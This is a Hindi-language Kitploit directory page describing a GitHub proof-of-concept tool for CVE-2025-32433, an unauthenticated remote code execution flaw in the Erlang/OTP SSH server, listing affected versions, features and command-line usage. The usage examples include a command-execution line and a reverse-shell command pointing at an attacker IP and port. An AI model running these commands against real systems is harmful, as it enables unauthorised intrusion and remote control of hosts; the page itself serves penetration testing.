Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC — यह कमजोरी एक हमलावर को, जिसके पास Erlang/OTP SSH सर्वर तक नेटवर्क पहुंच है, बिना पूर्व प्रमाणीकरण के मनमाना कोड निष्पादित करने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/omer-efe-curkus/cve-2025-32433-erlang-otp-ssh-rce-poc
भेद्यता विश्लेषणशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubomer-efe-curkus/cve-2025-32433-erlang-otp-ssh-rce-poc

CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

यह कमजोरी एक हमलावर को, जिसके पास Erlang/OTP SSH सर्वर तक नेटवर्क पहुंच है, बिना पूर्व प्रमाणीकरण के मनमाना कोड निष्पादित करने की अनुमति देती है।

रिपॉजिटरी देखें
16231 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

यह भेद्यता एक हमलावर को, जिसके पास Erlang/OTP SSH सर्वर तक नेटवर्क पहुंच है, बिना किसी प्रमाणीकरण के मनमाना कोड निष्पादित करने की अनुमति देती है।

विवरण

Erlang/OTP SSH सर्वर में एक गंभीर भेद्यता पाई गई है जो एक हमलावर को बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) करने में सक्षम बना सकती है। SSH प्रोटोकॉल संदेश प्रबंधन में एक त्रुटि का शोषण करके, एक दुर्भावनापूर्ण अभिनेता प्रभावित सिस्टमों तक अनधिकृत पहुंच प्राप्त कर सकता है और वैध क्रेडेंशियल्स के बिना मनमाने कमांड निष्पादित कर सकता है। इससे उक्त होस्ट से समझौता हो सकता है, जिससे तीसरे पक्षों द्वारा संवेदनशील डेटा तक अनधिकृत पहुंच और हेरफेर, या सेवा से इनकार (DoS) हमले हो सकते हैं।

प्रभावित संस्करण

root@kitploit:~
OTP-27.3.2 और उससे पहले
OTP-26.2.5.10 और उससे पहले
OTP-25.3.2.19 और उससे पहले

विशेषताएं

  • भेद्यता जांच: पता लगाएं कि कोई लक्ष्य CVE-2025-32433 के प्रति संवेदनशील है या नहीं।
  • शोषण निष्पादन: मनमाने कमांड निष्पादित करें।
  • रिवर्स शेल: बैश-आधारित रिवर्स शेल शुरू करें।

उपयोग

root@kitploit:~
python cve-2025-32433.py <host> [options]

विकल्प:

root@kitploit:~
-p PORT, --port PORT: SSH पोर्ट (डिफ़ॉल्ट: 22)

-t TIMEOUT, --timeout TIMEOUT: सेकंड में कनेक्शन टाइमआउट (डिफ़ॉल्ट: 5)

-c COMMAND, --command COMMAND: निष्पादित करने के लिए कस्टम कमांड

--check: जांचें कि लक्ष्य संवेदनशील है या नहीं

-u urls.txt, --urlfile urls.txt: स्कैन करने के लिए होस्टों की सूची वाली फ़ाइल (एक प्रति पंक्ति)

-o output.txt, --output output.txt: परिणामों को संग्रहीत करने के लिए आउटपुट फ़ाइल।

--shell: रिवर्स शेल लॉन्च करें

--lhost LHOST: रिवर्स शेल के लिए हमलावर का आईपी

--lport LPORT: रिवर्स शेल के लिए हमलावर का पोर्ट (डिफ़ॉल्ट: 4444)

उदाहरण:

भेद्यता जांचें:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 --check

एक कमांड निष्पादित करें:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 -c 'cat pwned.txt'

रिवर्स शेल शुरू करें:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

संदर्भ

GitHub सलाहकार

NVD CVE-2025-32433

प्लेटफ़ॉर्म सुरक्षा

टूल डाउनलोड करें